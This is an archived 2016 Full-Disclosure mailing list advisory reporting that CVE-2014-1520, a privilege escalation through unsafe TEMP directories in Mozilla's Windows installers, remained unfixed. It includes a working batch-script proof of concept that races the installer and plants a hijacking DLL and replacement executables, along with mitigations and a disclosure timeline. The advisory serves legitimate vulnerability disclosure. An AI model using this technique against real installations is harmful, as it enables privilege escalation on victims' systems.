lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <AC7734DD36F44208813991EFDAD33D7C@W340>
Date: Wed, 15 Jun 2016 00:37:48 +0200
From: "Stefan Kanthak" <stefan.kanthak@...go.de>
To: <bugtraq@...urityfocus.com>
Cc: fulldisclosure@...lists.org
Subject: [FD] [CVE-2014-1520] NOT FIXED: privilege escalation via Mozilla's
	executable installers

Hi @ll,

<https://bugzilla.mozilla.org/show_bug.cgi?id=961676> should
have fixed CVE-2014-1520 in Mozilla's executable installers for
Windows ... but does NOT!

JFTR: this type of vulnerability (really: a bloody stupid trivial
      beginner's error!) is well-known and well-documented as
      <https://cwe.mitre.org/data/definitions/379.html>.


Proof of concept/demonstration:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

0. download "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe",
   "Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe"
   and save them in an arbitrary directory;

1. download <http://home.arcor.de/skanthak/download/SHFOLDER.DLL>
   plus <http://home.arcor.de/skanthak/download/SENTINEL.EXE> and
   save them in an(other) arbitrary directory;

2. start your editor, copy and paste the following 10 lines and
   save them as "POC.CMD" in the same directory as "SHFOLDER.DLL"
   and "SENTINEL.EXE" downloaded in step 1:

:WAIT1
@If Not Exist "%TEMP%\7z*.tmp" Goto :WAIT1
For /D %%! In ("%TEMP%\7z*.tmp") Do Set foobar=%%!
Copy "%~dp0shfolder.dll" "%foobar%\shfolder.dll"
:WAIT2
@If Not Exist "%foobar%\core\maintenanceservice.exe" Goto :WAIT2
Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice.exe"
:WAIT3
@If Not Exist "%foobar%\core\maintenanceservice_installer.exe" Goto :WAIT3
Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice_installer.exe"

3. execute the batch script "POC.CMD" created in step 2;

4. execute "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe",
   "Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe"
   downloaded in step 0. and proceed as directed: notice the message
   boxed displayed from the copies of "SHFOLDER.DLL" and "SENTINEL.EXE"
   placed by the batch script started in step 3 in the unsafe TEMP
   subdirectory created by Mozilla's vulnerable executable installers!

PWNED!


Mitigation(s):
~~~~~~~~~~~~~~

0. don't use executable installers. DUMP THEM, NOW!

1. see <http://home.arcor.de/skanthak/!execute.html> as well as
   <http://home.arcor.de/skanthak/SAFER.html>.

2. stay away from Mozilla's vulnerable installers for their Windows
   software (at least until Mozilla starts to develop a sense for
   the safety and security of their users).


stay tuned
Stefan Kanthak


Timeline:
~~~~~~~~~

2015-10-25    <https://bugzilla.mozilla.org/show_bug.cgi?id=1218199>

              not even an attempt to fix this vulnerability (check but
              <https://blog.mozilla.org/blog/2015/10/23/mozilla-launches-open-source-support-program/>)

2016-04-30    <https://bugzilla.mozilla.org/show_bug.cgi?id=1269111>
              <https://bugzilla.mozilla.org/show_bug.cgi?id=1269113>
              <https://bugzilla.mozilla.org/show_bug.cgi?id=1269122>
              <https://bugzilla.mozilla.org/show_bug.cgi?id=1269123>
              <https://bugzilla.mozilla.org/show_bug.cgi?id=1269142>
              <https://bugzilla.mozilla.org/show_bug.cgi?id=1269144>

              not even an attempt to fix this vulnerability (check but
              <https://blog.mozilla.org/blog/2016/06/09/help-make-open-source-secure/>)

2016-06-15    deadline expired after 45 days, report published

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ